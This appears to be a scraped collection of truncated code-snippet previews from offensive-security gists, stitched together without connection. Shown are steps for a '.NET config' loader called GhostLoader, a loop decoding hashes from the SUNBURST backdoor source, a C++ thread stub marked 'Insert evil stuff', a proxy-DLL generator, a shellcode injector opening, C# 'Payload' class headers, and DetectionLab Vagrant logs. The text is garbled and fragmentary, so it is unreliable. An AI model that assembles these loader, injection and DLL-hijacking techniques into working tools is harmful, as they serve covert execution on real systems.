GhostLoader Steps :)
1. Create C:\Tools
2. Copy a .NET binary (any .NET binary will do) to C:\Tools
3. In this example, we use FileHistory.exe, but any .NET app will do.
4. Ensure FileHistory.exe.config is in the same path
5. Execute C:\Tools\FileHistory.exe

//for i in `cat fnv1a_xor_hashes.txt`; do
//lookup=`echo $i | cut -d "," -f 2`
//retn=`echo $i | cut -d "," -f 1`
//sed -i "s/$lookup/\"$retn\"/g" OrionImprovementBusinessLayer.cs
//done
using System;
using System.Collections.Generic;
using System.Configuration;

#include <Windows.h>
#include <intrin.h>
#include <string>
#include <TlHelp32.h>
#include <psapi.h>

DWORD WINAPI Thread(LPVOID lpParam) {
    // Insert evil stuff
    ExitProcess(0);

""" | |
This script generates a function forwarding header | |
for proxy DLL generation. | |
It is expected that DUMPBIN.EXE is in the path. | |
""" | |
import logging as l | |
import optparse | |
import os | |
import os.path |
//
// main.swift
// HTTPGet
//
// Created by david on 9/30/20.
//
import Foundation

func async_req() -> Void {

using System;
using System.Runtime.InteropServices;

namespace Inject
{
    class Program
    {
        static void Main(string[] args)
        {
            byte[] shellcode;

using System;
using System.IO;
using System.Diagnostics;
using System.Reflection;
using System.Runtime.InteropServices;
using System.Net;
using System.IO.Compression;

public class Payload
{

using System;
using System.IO;
using System.Net;
using System.Diagnostics;
using System.IO.Compression;
using System.Runtime.InteropServices;

public class Payload
{
    public Payload()

Bringing machine 'logger' up with 'vmware_desktop' provider...
==> logger: Cloning VMware VM: 'bento/ubuntu-16.04'. This can take some time...
==> logger: Checking if box 'bento/ubuntu-16.04' version '201808.24.0' is up to date...
==> logger: A newer version of the box 'bento/ubuntu-16.04' for provider 'vmware_desktop' is
==> logger: available! You currently have version '201808.24.0'. The latest is version
==> logger: '201912.04.0'. Run `vagrant box update` to update.
==> logger: Verifying vmnet devices are healthy...
==> logger: Preparing network adapters...
==> logger: Starting the VMware VM...
==> logger: Waiting for the VM to receive an address...

Bringing machine 'wef' up with 'vmware_desktop' provider...
==> wef: Cloning VMware VM: 'detectionlab/win2016'. This can take some time...
==> wef: Checking if box 'detectionlab/win2016' version '1.4' is up to date...
==> wef: Verifying vmnet devices are healthy...
==> wef: Preparing network adapters...
WARNING: The VMX file for this box contains a setting that is automatically overwritten by Vagrant
WARNING: when started. Vagrant will stop overwriting this setting in an upcoming release which may
WARNING: prevent proper networking setup. Below is the detected VMX setting:
WARNING:
WARNING: ethernet0.pcislotnumber = "33"